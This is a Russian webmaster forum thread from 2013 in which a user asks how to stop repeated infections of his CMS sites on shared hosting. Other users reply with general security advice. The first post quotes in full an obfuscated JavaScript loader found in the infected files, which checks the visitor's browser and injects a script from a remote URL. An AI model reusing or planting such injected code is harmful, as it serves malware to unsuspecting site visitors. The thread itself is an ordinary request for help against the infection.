Перейти к содержимому


× Быстрый вопрос
Пользователь месяца
Андрей WPM Андрей WPM 1-й за Июль
Очков активности: 2 142 4 темы, 90 сообщений, 14 баллов репутации
Сайт: wpmaster.kz
ТОП самых активных за этот месяц
  • Фотография Rodiola
    #1

    Rodiola (rukodelkovo.ru)
    Очков активности: 369 1 тема, 79 сообщений, 3 балла репутации

  • Фотография maxnik
    #2

    maxnik (konovalovpavel.ru)
    Очков активности: 217.5 0 тем, 29 сообщений, 5 баллов репутации

  • Фотография Андрей WPM
    #3

    Андрей WPM (wpmaster.kz)
    Очков активности: 103.5 Вне конкурса за определение пользователя месяца

  • Фотография Megoydagi
    #4

    Megoydagi (24ho.ru)
    Очков активности: 93 5 тем, 16 сообщений, 2 балла репутации

  • Фотография annabum
    #5

    annabum
    Очков активности: 75 2 темы, 19 сообщений, 2 балла репутации

  • Фотография IxMaster
    #6

    IxMaster (site.ru)
    Очков активности: 66 2 темы, 16 сообщений, 2 балла репутации

  • Фотография Vmir
    #7

    Vmir
    Очков активности: 57 Вне конкурса за определение пользователя месяца

  • Фотография FIvYUr
    #8

    FIvYUr (moy-evroopt.ru)
    Очков активности: 36 0 тем, 8 сообщений, 3 балла репутации

  • Фотография lena220678
    #9

    lena220678
    Очков активности: 34.5 2 темы, 17 сообщений, 1 балл репутации

  • Фотография re-search
    #10

    re-search
    Очков активности: 24 4 темы, 4 сообщения, 1 балл репутации

  • Показать весь ТОП 10
Поддержите форум! =)
Апдейты
  • Яндекс ИКС: 30.07.2019
  • Яндекс выдача: 19.08.2019
Топ 5 участников по репутации


Где и как позакрывать дыры от вирусов на хостинге?

#1 Zevss

Zevss
  • Пользователь
  • 492 сообщений
  • Репутация: 13
0

Отправлено 30 Ноябрь 2013 - 10:47

Периодически на хостинге заражаются практически все сайты, смс: вп, дле, джумла.
Предполагаю, что очень серьезного на сайтах ничего нет, так как вебмастера Я и Г уже бы написали.
Сидит какая-то хрень, я все удалю, а оно снова в сайты гадню подсаживает.
вот скрин, что было:
Изображение
Все файлы имеют расширение js.
Во всех одинаковое содержание:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d A(l){H(e.t&&e.G){5 s=e.G(\'1g\')[0];5 f=e.t(\'1h\');f.p(\'1i\',\'1j/1f\');f.p(\'l\',l);5 1e="=1a[<}8~j;%%]";5 1b="&4; y}[={4]";5 1c="1d/1k$#k]1l~z{1s:1t";5 19="%#1v=1r+3:%>1q";5 1m="X(^~1n{[1o@1p&1w-{W[";s.R(f)}}d E(){m x.O()}5 T="}0@U;N`)I)*]%$J";5 M="6]2(P}7-18=.h 14";5 15="b`~+2*u?+16@";5 17="13$12[Y$+";5 V="*Z=.q`10{11";d v(c){m c.r(o)!=-1}5 1u="4,*@`n+S[/*25";5 1x="C^1X?K * L";5 1W="9]+;20+*{*>$+)*21-1Z";5 1Y="[w=23;$22";5 27="26($24]2[i?.>}!a}";5 B="1U://1E.1F.c/1G";5 o="o";5 1H="1V]6:1D}!1C";5 1y="1z(}0}#@g`0[1A%1B*b";5 1I="4]%?1J^`~1Q<~4&4[1R*Q ";5 1S="1T(1P";5 1O="+~,& 1K!3`!(Q*/";d D(c){m c.r("1L")==-1}d F(){5 c=x.1M.1N();H(D(c)&&v(c)&&E()){A(<img src='http://www.masterwebs.ru/public/style_emoticons/<#EMO_DIR#>/cool.png' class='bbc_emoticon' alt=':)' />}}F();',62,132,'|||||var|||||||ua|function|document|script_tag||||||src|return||win|setAttri
bute||indexOf|head_tag|createElement||isWin||navigator|||includeJavascript|url||n
otChrome|cond3|includeCounter|getElementsByTagName|if|oJTM7|pr|||bDyWnY1|UxJ|java
Enabled|xX||appendChild||bDyWnY0|tk|bDyWnY4|||abX|o5|RJ|Zme_|Pg|311|0Xf|bDyWnY2|u
6|bDyWnY3|rX|eqCaxYl3|O0BnA|eqCaxYl1|eqCaxYl2|81|eqCaxYl0|javascript|head|script|
type|text|Tm|l2|eqCaxYl4|6Z0a1|0p|bEc|MhW|KR6|uS|kS|BzqqE0|33|F9|BzqqE1|DtqGo1|7K
|rVDlg|6P|zi8|k4ld2|exaxad|pp|b23e441d405961897c09b2c9c9a2cdfcb23e441d405961897c0
9b2c9c9a2cdfcb23e441d405961897c09b2c9c9a2c|DtqGo0|DtqGo2|w6l|N3|chrome|userAgent|
toLowerCase|DtqGo4|OP|lE|QS|DtqGo3|tj4o0kk2|http|CX0|BzqqE2|5W|BzqqE3|5IG|Ct|92|6
Gr|x9YO|Ia8|57P|UtVM|BzqqE4'.split('|'),0,{}))

 

 

  • 0

#2 Golland

Golland
  • Неактивные
  • 164 сообщений
  • Репутация: 10

Отправлено 30 Ноябрь 2013 - 14:01

Сложно сказать. Папки "administrator" на сайтах запаролены ? А что говорит по этому поводу сам хостер, или сайты на домашнем сервере ?
  • 0

#3 Blogger

Blogger
  • Пользователь
  • 59 сообщений
  • Репутация: 7

Отправлено 30 Ноябрь 2013 - 16:13

А может дело не в хостинге а в дырявых движках? В первую очередь Джумла, или если у Вас нулёный DLE, WP тоже не самый лучший двиг со стороны безопасности. Плюс к этому вирусы могут попасть через кражу паролей доступа по FTP. Нужно точно выснить окуда ноги растут.
  • 0

#4 Golland

Golland
  • Неактивные
  • 164 сообщений
  • Репутация: 10

Отправлено 02 Декабрь 2013 - 16:14

Blogger, а какой движок не дырявый ? Просветите нас. Не бывает дырявых движков, бывают дырявые головы (не в обиду никому будет сказано). Любой, даже самый крутой самописный движок можно взломать, точно так же, как и любой бесплатный движок можно сделать достаточно сложно взламываемым проведя ряд антихакерских мероприятий и настроив его на автоматическое обновление версий.
  • 0

#5 seomack

seomack
  • Неактивные
  • 22 сообщений
  • Репутация: 0

Отправлено 07 Декабрь 2013 - 14:58

Я думаю это проблема хостеров, если что то подобное произошло необходимо обратиться в службу поддержки, так должны помочь.
  • 0



Похожие темы

  Название темы Автор Статистика Последнее сообщение

Оформление форума – IPBSkins.ru